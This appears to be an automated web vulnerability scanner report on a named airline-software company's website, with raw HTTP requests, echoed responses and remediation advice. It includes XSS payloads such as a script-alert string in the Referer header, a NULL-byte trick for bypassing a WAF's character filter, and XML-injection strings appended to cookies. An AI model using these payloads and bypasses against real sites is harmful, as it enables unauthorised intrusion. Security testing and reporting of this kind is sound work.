GET /home/products_services/services/consulting_services?%002bc49<a>094e5b00dcb=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/services/consulting_services/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322619; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_control%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fsabre_gds_display_analysis%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... <a>094e5b00dcb=1">consulting services?%002bc49<a>094e5b00dcb=1</a> ...[SNIP]...
3.142. http://www.sabreairlinesolutions.com/home/products_services/technology/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.sabreairlinesolutions.com
Path:
/home/products_services/technology/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0081621"><a>0b22d3d3d40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81621"><a>0b22d3d3d40 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /home/products_services/technology/?%0081621"><a>0b22d3d3d40=1 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322231; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A1%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3Bi%3A2%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A4%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3B%7D;
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40ca5"><script>alert(1)</script>56456157c47 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /home/includes/form_list HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D; Referer: http://www.google.com/search?hl=en&q=40ca5"><script>alert(1)</script>56456157c47
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.
The __utmb cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the __utmb cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /home/products_services/product/web_services HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322903; __utmb=178985382.2.10.1286295079]]>>; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <li>Increases development speed; uses XML, SOAP and travel industry standards,</li> ...[SNIP]...
The exp_last_visit cookie appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the exp_last_visit cookie. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /home/products_services/product/web_services HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086]]>>; __utmc=178985382; exp_last_activity=1286322903; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A2%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_gate_manager%2F%22%3Bi%3A4%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3B%7D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <li>Increases development speed; uses XML, SOAP and travel industry standards,</li> ...[SNIP]...
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
Request
GET /home/news_events/event/sabresonic_global_conference2 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.
Common explanations for Referer-dependent responses include:
Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.
If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.
Request 1
GET /home/includes/form_list?iframe=true&width=500&height=500 HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/enterprise_operations/my_list/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323073; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A3%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.
You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.
Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.
Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <br /> <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=73098&p=irol-newsArticle&ID=1475404&highlight=" target="_blank">Sabre Holdings acquires flight planning company f:wz</a> ...[SNIP]... <br /> <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=73098&p=irol-newsArticle&ID=1474743&highlight=" target="_blank">Sabre President Tapped by U.S. Commerce Secretary to encourage tourism to the United States</a> ...[SNIP]... <br /> <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=73098&p=irol-newsArticle&ID=1474241&highlight=" target="_blank">TRIP Linhas A..reas selects SabreSonic CSS reservations system, Sabre operations solutions</a> ...[SNIP]... <br /> <a href="http://phx.corporate-ir.net/phoenix.zhtml?c=73098&p=irol-newsArticle&ID=1465117&highlight=" target="_blank">Airphil Express stays with Sabre for rebirth and growth</a> ...[SNIP]... <br /> <a href="http://www.sabre-holdings.com/newsroom/pdfs/Sam-Gilliland-NBTA-2010.pdf" target="_blank"><strong> ...[SNIP]... <br /> <a href="http://www.sabre-events.com/2010-airvision-design-conference">AirVision Design Conference - London England</a> ...[SNIP]... <p>Committed to minimizing the environmental impact of our global operations and to promoting sustainable business practices in travel and tourism. <a href="http://www.sabre-holdings.com/aboutUs/corporate/sustainability.html">www.sabre-holdings.com</a> ...[SNIP]... <p>Get online access to all the product resources you need with the <a href="http://community.sabre.com"><em> ...[SNIP]... <li id="careers"><a href="http://sabre-holdings.com/careers/index.html">Careers</a> ...[SNIP]... <li id="holdings"><a href="http://www.sabre-holdings.com">Sabre Holdings</a> ...[SNIP]...
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
Request
GET /home/search/show_results HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/3/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fincludes%2Fform_list%2F%22%3Bi%3A1%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A2%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A3%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A4%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_network%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/about/complete_the_picture/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/about/copyright_and_trademark/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/about/executive_team/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/about/executive_team/greg_gilchrist HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321270; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A4%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/about/executive_team/stephen_m._clampett HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321284; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/about/executive_team/tom_klein HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321283; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/about/media_press/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/about/privacy_policy/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/about/sitemap/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=970953067; __utmc=178985382; exp_last_activity=1286313086; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home/about/the_as_advantage/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
